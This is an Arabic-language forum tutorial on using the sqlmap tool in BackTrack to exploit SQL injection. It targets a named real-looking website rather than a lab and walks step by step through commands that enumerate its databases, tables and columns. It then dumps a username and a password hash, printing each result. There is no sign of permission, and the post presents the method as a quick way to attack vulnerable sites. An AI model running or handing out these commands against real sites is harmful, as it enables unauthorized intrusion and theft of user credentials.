بسم الله الرحمن  الرحيم 
  السلام عليكم ورحمة الله وبركاته
  الكل يعرف انه 
 ثغرات  sql من اقوى واكثر الثغرات  انتشارا واحيانا تاخذ وقت  في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة  ممكنة باستخدام اداة في 
 الباك   تراك   اسم الأداة :sqlmap
  مسار الاداة : /pentest/database/sqlmap
  لغة البرمجة : python
  الأن كيفية استخدام الاداة في عملية الحقن
 اولا  : استخراج اسماء قواعد البيانات  لنقل ان هذا الموقع مصاب بثغرة  sql   كود:
 http://www.bcspeakers.com/page.php?id=22
  
 وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط  واذا وجد خطأ كان الموقع مصاب 
  الأن الأمر المستخدم في استخراج القواعد لهذا الموقع 
  كود:
 python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
  
 
 النتيجة 
  كود:
 available databases [2]:[*] information_schema[*] www-bcspeakerstest
  مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة  هى 
 "www-bcspeakerstest"
  ثانيا : استخراج الجداول
  القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل   كود:
 python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
  والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل  حال انا وجدت الجدول المستهدف وهو "_user" ثالثا : استخراج الأعمدة الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي   كود:
 python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
  والنتيجة كالتالي   كود:
 +----------+---------------------------+
| Column   | Type                      |
+----------+---------------------------+
| id_user  | int(10) unsigned zerofill |
| password | text                      |
| username | text                      |
+----------+---------------------------+
  كما ترون الأعمدة المستهدفة هي 
  password
  username رابعا : اسخراج البيانات من الاعمدة العمود الاول هو عامود اسم المستخدم "username" سوف يكون  الكود كالتالي   كود:
 python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
  النتيجة    كود:
 +--------------+
| username     |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
  كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود 
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد   كود:
 python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
  
 سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع  قاعدة البيانات المرفقة باالأداة   كود:
 recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
  تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي   كود:
 +----------------------------------+
| password                         |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
  
 كما ترون تم استخراج البيانات بسرعة كبيرة
اتمنى ان يعجبكم الشرح
والسلام عليكم ورحمة الله وبركاته 
hsjyhg eyvhj sql td hgfh; jvh;